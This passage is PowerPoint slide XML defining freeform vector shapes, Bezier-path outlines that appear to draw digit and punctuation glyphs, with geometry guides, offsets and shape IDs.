                <a:gd name="T10" fmla="*/ 62 w 62"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 31 w 62"/>
                <a:gd name="T13" fmla="*/ 153 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 62"/>
                <a:gd name="T15" fmla="*/ 184 h 215"/>
                <a:gd name="T16" fmla="*/ 31 w 62"/>
                <a:gd name="T17" fmla="*/ 215 h 215"/>
                <a:gd name="T18" fmla="*/ 62 w 62"/>
                <a:gd name="T19" fmla="*/ 1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15">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="62" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="166"/>
                    <a:pt x="47" y="153"/>
                    <a:pt x="31" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="153"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="202"/>
                    <a:pt x="15" y="215"/>
                    <a:pt x="31" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="215"/>
                    <a:pt x="62" y="200"/>
                    <a:pt x="62" y="18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13" name="Freeform 254">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F897AD-1152-41EF-8A72-8930C3E9927E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId54"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6051551" y="3221038"/>
              <a:ext cx="88900" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 210"/>
                <a:gd name="T1" fmla="*/ 110 h 310"/>
                <a:gd name="T2" fmla="*/ 53 w 210"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 53 w 210"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 210"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 210"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 210"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 38 w 210"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 18 w 210"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 210"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 34 w 210"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 49 w 210"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 112 w 210"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 210"/>
                <a:gd name="T25" fmla="*/ 209 h 310"/>
                <a:gd name="T26" fmla="*/ 98 w 210"/>
                <a:gd name="T27" fmla="*/ 279 h 310"/>
                <a:gd name="T28" fmla="*/ 38 w 210"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 45 w 210"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 23 w 210"/>
                <a:gd name="T33" fmla="*/ 209 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 210"/>
                <a:gd name="T35" fmla="*/ 233 h 310"/>
                <a:gd name="T36" fmla="*/ 98 w 210"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 210 w 210"/>
                <a:gd name="T39" fmla="*/ 209 h 310"/>
                <a:gd name="T40" fmla="*/ 113 w 210"/>
                <a:gd name="T41" fmla="*/ 1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0" h="310">
                  <a:moveTo>
                    <a:pt x="113" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="110"/>
                    <a:pt x="73" y="114"/>
                    <a:pt x="53" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="53" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="30"/>
                    <a:pt x="192" y="30"/>
                    <a:pt x="192" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="0"/>
                    <a:pt x="180" y="0"/>
                    <a:pt x="172" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="18" y="4"/>
                    <a:pt x="18" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="162"/>
                    <a:pt x="18" y="173"/>
                    <a:pt x="34" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="173"/>
                    <a:pt x="45" y="171"/>
                    <a:pt x="49" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="150"/>
                    <a:pt x="83" y="141"/>
                    <a:pt x="112" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="141"/>
                    <a:pt x="175" y="177"/>
                    <a:pt x="175" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="249"/>
                    <a:pt x="140" y="279"/>
                    <a:pt x="98" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="279"/>
                    <a:pt x="52" y="275"/>
                    <a:pt x="38" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="245"/>
                    <a:pt x="45" y="242"/>
                    <a:pt x="45" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="217"/>
                    <a:pt x="33" y="209"/>
                    <a:pt x="23" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="209"/>
                    <a:pt x="0" y="214"/>
                    <a:pt x="0" y="233"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="275"/>
                    <a:pt x="42" y="310"/>
                    <a:pt x="98" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="310"/>
                    <a:pt x="210" y="265"/>
                    <a:pt x="210" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="159"/>
                    <a:pt x="171" y="110"/>
                    <a:pt x="113" y="11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14" name="Freeform 255">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BC5ADE6-66B7-44FC-9D8C-54B9CB432CAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId55"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6162676" y="3221038"/>
              <a:ext cx="88900" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 210"/>
                <a:gd name="T1" fmla="*/ 110 h 310"/>
                <a:gd name="T2" fmla="*/ 52 w 210"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 52 w 210"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 210"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 210"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 210"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 38 w 210"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 18 w 210"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 210"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 34 w 210"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 49 w 210"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 112 w 210"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 210"/>
                <a:gd name="T25" fmla="*/ 209 h 310"/>
                <a:gd name="T26" fmla="*/ 98 w 210"/>
                <a:gd name="T27" fmla="*/ 279 h 310"/>
                <a:gd name="T28" fmla="*/ 38 w 210"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 44 w 210"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 23 w 210"/>
                <a:gd name="T33" fmla="*/ 209 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 210"/>
                <a:gd name="T35" fmla="*/ 233 h 310"/>
                <a:gd name="T36" fmla="*/ 98 w 210"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 210 w 210"/>
                <a:gd name="T39" fmla="*/ 209 h 310"/>
                <a:gd name="T40" fmla="*/ 112 w 210"/>
                <a:gd name="T41" fmla="*/ 1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0" h="310">
                  <a:moveTo>
                    <a:pt x="112" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="110"/>
                    <a:pt x="73" y="114"/>
                    <a:pt x="52" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="52" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="30"/>
                    <a:pt x="192" y="30"/>
                    <a:pt x="192" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="0"/>
                    <a:pt x="180" y="0"/>
                    <a:pt x="172" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="18" y="4"/>
                    <a:pt x="18" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="162"/>
                    <a:pt x="18" y="173"/>
                    <a:pt x="34" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="173"/>
                    <a:pt x="45" y="171"/>
                    <a:pt x="49" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="150"/>
                    <a:pt x="83" y="141"/>
                    <a:pt x="112" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="141"/>
                    <a:pt x="175" y="177"/>
                    <a:pt x="175" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="249"/>
                    <a:pt x="140" y="279"/>
                    <a:pt x="98" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="279"/>
                    <a:pt x="52" y="275"/>
                    <a:pt x="38" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="245"/>
                    <a:pt x="44" y="242"/>
                    <a:pt x="44" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="217"/>
                    <a:pt x="33" y="209"/>
                    <a:pt x="23" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="209"/>
                    <a:pt x="0" y="214"/>
                    <a:pt x="0" y="233"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="275"/>
                    <a:pt x="42" y="310"/>
                    <a:pt x="98" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="310"/>
                    <a:pt x="210" y="265"/>
                    <a:pt x="210" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="159"/>
                    <a:pt x="171" y="110"/>
                    <a:pt x="112" y="11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15" name="Freeform 256">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E16C37F-BB39-48E9-BD09-9C75C620F396}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId56"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6272214" y="3221038"/>
              <a:ext cx="88900" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 209"/>
                <a:gd name="T1" fmla="*/ 110 h 310"/>
                <a:gd name="T2" fmla="*/ 52 w 209"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 52 w 209"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 209"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 209"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 209"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 38 w 209"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 18 w 209"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 209"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 34 w 209"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 49 w 209"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 111 w 209"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 209"/>
                <a:gd name="T25" fmla="*/ 209 h 310"/>
                <a:gd name="T26" fmla="*/ 97 w 209"/>
                <a:gd name="T27" fmla="*/ 279 h 310"/>
                <a:gd name="T28" fmla="*/ 38 w 209"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 44 w 209"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 22 w 209"/>
                <a:gd name="T33" fmla="*/ 209 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 209"/>
                <a:gd name="T35" fmla="*/ 233 h 310"/>
                <a:gd name="T36" fmla="*/ 97 w 209"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 209 w 209"/>
                <a:gd name="T39" fmla="*/ 209 h 310"/>
                <a:gd name="T40" fmla="*/ 112 w 209"/>
                <a:gd name="T41" fmla="*/ 1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310">
                  <a:moveTo>
                    <a:pt x="112" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="110"/>
                    <a:pt x="72" y="114"/>
                    <a:pt x="52" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="52" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="30"/>
                    <a:pt x="192" y="30"/>
                    <a:pt x="192" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="0"/>
                    <a:pt x="180" y="0"/>
                    <a:pt x="172" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="18" y="4"/>
                    <a:pt x="18" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="162"/>
                    <a:pt x="18" y="173"/>
                    <a:pt x="34" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="173"/>
                    <a:pt x="45" y="171"/>
                    <a:pt x="49" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="150"/>
                    <a:pt x="82" y="141"/>
                    <a:pt x="111" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="141"/>
                    <a:pt x="175" y="177"/>
                    <a:pt x="175" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="249"/>
                    <a:pt x="139" y="279"/>
                    <a:pt x="97" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="279"/>
                    <a:pt x="51" y="275"/>
                    <a:pt x="38" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="245"/>
                    <a:pt x="44" y="242"/>
                    <a:pt x="44" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="217"/>
                    <a:pt x="33" y="209"/>
                    <a:pt x="22" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="209"/>
                    <a:pt x="0" y="214"/>
                    <a:pt x="0" y="233"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="275"/>
                    <a:pt x="42" y="310"/>
                    <a:pt x="97" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="310"/>
                    <a:pt x="209" y="265"/>
                    <a:pt x="209" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="159"/>
                    <a:pt x="171" y="110"/>
                    <a:pt x="112" y="11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16" name="Freeform 257">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9518E5F3-5932-43F7-86FC-C93D78D8E3C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId57"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6383339" y="3221038"/>
              <a:ext cx="88900" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 210"/>
                <a:gd name="T1" fmla="*/ 110 h 310"/>
                <a:gd name="T2" fmla="*/ 53 w 210"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 53 w 210"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 210"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 210"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 210"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 38 w 210"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 18 w 210"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 210"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 34 w 210"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 49 w 210"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 112 w 210"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 210"/>
                <a:gd name="T25" fmla="*/ 209 h 310"/>
                <a:gd name="T26" fmla="*/ 98 w 210"/>
                <a:gd name="T27" fmla="*/ 279 h 310"/>
                <a:gd name="T28" fmla="*/ 38 w 210"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 45 w 210"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 23 w 210"/>
                <a:gd name="T33" fmla="*/ 209 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 210"/>
                <a:gd name="T35" fmla="*/ 233 h 310"/>
                <a:gd name="T36" fmla="*/ 98 w 210"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 210 w 210"/>
                <a:gd name="T39" fmla="*/ 209 h 310"/>
                <a:gd name="T40" fmla="*/ 112 w 210"/>
                <a:gd name="T41" fmla="*/ 1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0" h="310">
                  <a:moveTo>
                    <a:pt x="112" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="110"/>
                    <a:pt x="73" y="114"/>
                    <a:pt x="53" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="53" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="30"/>
                    <a:pt x="192" y="30"/>
                    <a:pt x="192" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="0"/>
                    <a:pt x="180" y="0"/>
                    <a:pt x="172" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="18" y="4"/>
                    <a:pt x="18" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="162"/>
                    <a:pt x="18" y="173"/>
                    <a:pt x="34" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="173"/>
                    <a:pt x="45" y="171"/>
                    <a:pt x="49" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="150"/>
                    <a:pt x="83" y="141"/>
                    <a:pt x="112" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="141"/>
                    <a:pt x="175" y="177"/>
                    <a:pt x="175" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="249"/>
                    <a:pt x="140" y="279"/>
                    <a:pt x="98" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="279"/>
                    <a:pt x="52" y="275"/>
                    <a:pt x="38" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="245"/>
                    <a:pt x="45" y="242"/>
                    <a:pt x="45" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="217"/>
                    <a:pt x="33" y="209"/>
                    <a:pt x="23" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="209"/>
                    <a:pt x="0" y="214"/>
                    <a:pt x="0" y="233"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="275"/>
                    <a:pt x="42" y="310"/>
                    <a:pt x="98" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="310"/>
                    <a:pt x="210" y="265"/>
                    <a:pt x="210" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="159"/>
                    <a:pt x="171" y="110"/>
                    <a:pt x="112" y="11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17" name="Freeform 258">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02498346-3555-439A-B641-C0A2535A7190}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId58"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6496051" y="3219451"/>
              <a:ext cx="84138" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 199"/>
                <a:gd name="T1" fmla="*/ 187 h 307"/>
                <a:gd name="T2" fmla="*/ 166 w 199"/>
                <a:gd name="T3" fmla="*/ 110 h 307"/>
                <a:gd name="T4" fmla="*/ 199 w 199"/>
                <a:gd name="T5" fmla="*/ 61 h 307"/>
                <a:gd name="T6" fmla="*/ 94 w 199"/>
                <a:gd name="T7" fmla="*/ 0 h 307"/>
                <a:gd name="T8" fmla="*/ 0 w 199"/>
                <a:gd name="T9" fmla="*/ 60 h 307"/>
                <a:gd name="T10" fmla="*/ 22 w 199"/>
                <a:gd name="T11" fmla="*/ 84 h 307"/>
                <a:gd name="T12" fmla="*/ 44 w 199"/>
                <a:gd name="T13" fmla="*/ 61 h 307"/>
                <a:gd name="T14" fmla="*/ 39 w 199"/>
                <a:gd name="T15" fmla="*/ 47 h 307"/>
                <a:gd name="T16" fmla="*/ 94 w 199"/>
                <a:gd name="T17" fmla="*/ 30 h 307"/>
                <a:gd name="T18" fmla="*/ 165 w 199"/>
                <a:gd name="T19" fmla="*/ 61 h 307"/>
                <a:gd name="T20" fmla="*/ 144 w 199"/>
                <a:gd name="T21" fmla="*/ 85 h 307"/>
                <a:gd name="T22" fmla="*/ 72 w 199"/>
                <a:gd name="T23" fmla="*/ 190 h 307"/>
                <a:gd name="T24" fmla="*/ 92 w 199"/>
                <a:gd name="T25" fmla="*/ 215 h 307"/>
                <a:gd name="T26" fmla="*/ 112 w 199"/>
                <a:gd name="T27" fmla="*/ 196 h 307"/>
                <a:gd name="T28" fmla="*/ 112 w 199"/>
                <a:gd name="T29" fmla="*/ 187 h 307"/>
                <a:gd name="T30" fmla="*/ 117 w 199"/>
                <a:gd name="T31" fmla="*/ 282 h 307"/>
                <a:gd name="T32" fmla="*/ 92 w 199"/>
                <a:gd name="T33" fmla="*/ 257 h 307"/>
                <a:gd name="T34" fmla="*/ 67 w 199"/>
                <a:gd name="T35" fmla="*/ 282 h 307"/>
                <a:gd name="T36" fmla="*/ 92 w 199"/>
                <a:gd name="T37" fmla="*/ 307 h 307"/>
                <a:gd name="T38" fmla="*/ 117 w 199"/>
                <a:gd name="T39" fmla="*/ 28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07">
                  <a:moveTo>
                    <a:pt x="112" y="187"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="164"/>
                    <a:pt x="120" y="135"/>
                    <a:pt x="166" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="102"/>
                    <a:pt x="199" y="87"/>
                    <a:pt x="199" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="43"/>
                    <a:pt x="187" y="0"/>
                    <a:pt x="94" y="0"/>
